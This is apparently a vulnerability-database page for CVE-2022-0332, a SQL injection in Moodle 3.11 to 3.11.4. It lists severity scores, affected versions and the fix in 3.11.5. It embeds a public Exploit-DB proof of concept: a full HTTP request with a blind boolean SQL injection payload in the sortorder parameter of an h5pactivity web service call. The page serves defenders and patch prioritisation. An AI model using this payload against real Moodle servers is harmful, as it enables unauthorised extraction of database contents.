CVE-2022-0332

unknown

Published 2022-01-28 · Modified 2024-02-19

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

SQL injection in Moodle

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-50700 webapps php text · 1 KB

lavclash75 · 2022-02-02

Moodle 3.11.4 - SQL Injection

text exploit Source: Exploit-DB

# Exploit Title: Moodle 3.11.4  - SQL Injection
# Date: 30/01/2022
# Exploit Author: lavclash75
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.11 to 3.11.4
# CVE: CVE-2022-0332
# POC

```
GET /moodle-3.11.4/webservice/rest/server.php?wstoken=98f7d8003180afbd46ee160fdc05a4fc&wsfunction=mod_h5pactivity_get_user_attempts&moodlewsrestformat=json&h5pactivityid=1&sortorder=%28SELECT%20%28CASE%20WHEN%20%28ORD%28MID%28%28IFNULL%28CAST%28DATABASE%28%29%20AS%20NCHAR%29%2C0x20%29%29%2C4%2C1%29%29%3E104%29%20THEN%20%27%27%20ELSE%20%28SELECT%205080%20UNION%20SELECT%204100%29%20END%29%29 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0
Host: local.numanturle.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

```

```

```

![PHP](img/orderby.jpg?raw=true "PHP")
![PHP](img/uri.jpg?raw=true "PHP")
![PHP](img/sqlmap.jpg?raw=true "PHP")

# Reference
 * [CVE-2022-0332](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0332)
 * [Git](https://git.moodle.org/gw?p=moodle.git;a=blobdiff;f=mod/h5pactivity/classes/external/get_user_attempts.php;h=8a27f821bc37f20bafaba6ef436871717b3817a3;hp=216653e93315c4d8ca084fe1e62b2041dece4531;hb=c7a62a8c82219b50589257f79021da1df1a76808;hpb=2ee27313cea0d7073f5a6a35eccdfddcb3a9adad)

Package impact

Ecosystem	Package	Vulnerable	Fixed
Packagist	moodle/moodle	`>=3.11,<3.11.5`	`3.11.5`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.